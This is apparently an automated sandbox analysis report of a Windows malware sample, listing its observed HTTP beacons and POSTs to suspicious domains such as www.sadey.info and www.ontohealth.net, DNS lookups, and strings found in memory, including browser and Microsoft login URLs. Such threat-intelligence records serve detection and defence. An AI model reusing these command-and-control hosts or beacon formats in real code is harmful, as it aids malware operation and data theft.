  User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected:
  GET /3tnk/?8RN4oRq=CW2JkxV3pcekLoIorT56ryscgS11ntIpF5Aeg7ZfnKRiExYc+D8BbmUzHwDhufn4r4Dro/61FctGFi0noZVWC4EErF1Fy7sjRinEodY+GdyVC1Z8TkDJNhe4fZdCuwZwItNyPB0=&SBV8T=1lJpZfbXA4K HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  Host: www.c6ytv.net
  User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Source: global traffic; HTTP traffic detected:
  GET /f8et/?SBV8T=1lJpZfbXA4K&8RN4oRq=Xc+PdMClmL/WIO2isq0x5LlJuoJRDXdLpdKh2o4ZOQaHQca6wh6b+iZ++523jXtiu5eeO8fPpGm95hdP5yrPQZ/IU8CBx+hGfkwf4+1MD46FKwSALgSHTW1ViZ9EzcIAYloemhI= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  Host: www.sadey.info
  User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global traffic | DNS traffic detected: DNS query: www.uphc255.vip
            Source: global traffic | DNS traffic detected: DNS query: www.integritywork.shop
            Source: global traffic | DNS traffic detected: DNS query: www.ontohealth.net
            Source: global traffic | DNS traffic detected: DNS query: www.c6ytv.net
            Source: global traffic | DNS traffic detected: DNS query: www.sadey.info
            Source: unknown | HTTP traffic detected: POST /xqh1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Connection: close Content-Length: 212 Content-Type: application/x-www-form-urlencoded Host: www.ontohealth.net Origin: http://www.ontohealth.net Referer: http://www.ontohealth.net/xqh1/ User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16 Data Raw: 38 52 4e 34 6f 52 71 3d 47 66 6b 70 57 31 36 77 64 67 53 36 69 46 32 39 57 64 2b 50 48 73 72 58 4c 33 33 63 78 6b 45 79 64 4b 31 38 69 4d 75 2b 48 48 6f 6a 70 46 49 79 47 75 6b 35 6a 4d 72 2b 4c 41 2f 4a 56 6e 43 55 42 48 76 6f 50 34 6b 4c 4f 75 45 75 55 59 50 4e 55 56 6e 39 6f 6c 42 7a 70 31 55 32 73 67 47 38 66 38 70 74 52 61 30 33 79 77 75 52 44 7a 53 73 2f 31 35 74 77 31 6b 36 71 37 31 5a 78 58 48 6c 76 74 51 43 76 79 43 30 70 78 63 49 67 6d 48 52 69 67 45 44 6f 6f 35 62 56 56 62 52 62 4e 39 51 4e 58 44 78 6c 7a 6a 55 58 76 44 53 43 48 66 38 76 4b 6f 57 2b 39 7a 6c 62 32 79 65 64 50 30 2f 70 79 36 51 4a 35 58 2f 71 34 6d 79 Data Ascii: 8RN4oRq=GfkpW16wdgS6iF29Wd+PHsrXL33cxkEydK18iMu+HHojpFIyGuk5jMr+LA/JVnCUBHvoP4kLOuEuUYPNUVn9olBzp1U2sgG8f8ptRa03ywuRDzSs/15tw1k6q71ZxXHlvtQCvyC0pxcIgmHRigEDoo5bVVbRbN9QNXDxlzjUXvDSCHf8vKoW+9zlb2yedP0/py6QJ5X/q4my
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty Date: Wed, 06 Nov 2024 15:07:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty Date: Wed, 06 Nov 2024 15:07:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty Date: Wed, 06 Nov 2024 15:07:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty Date: Wed, 06 Nov 2024 15:07:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 06 Nov 2024 15:07:49 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 06 Nov 2024 15:07:52 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 06 Nov 2024 15:07:54 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 06 Nov 2024 15:07:57 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000000.2258645214.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: rmfPfCOHcNt.exe, 00000017.00000002.3359416956.0000000004D78000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.sadey.info
            Source: rmfPfCOHcNt.exe, 00000017.00000002.3359416956.0000000004D78000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.sadey.info/f8et/
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://help.hover.com/home?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: EhStorAuthn.exe, 00000016.00000003.2884633566.000000000767B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.0000000002879000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://twitter.com/hover
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0
            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/about?source=parked
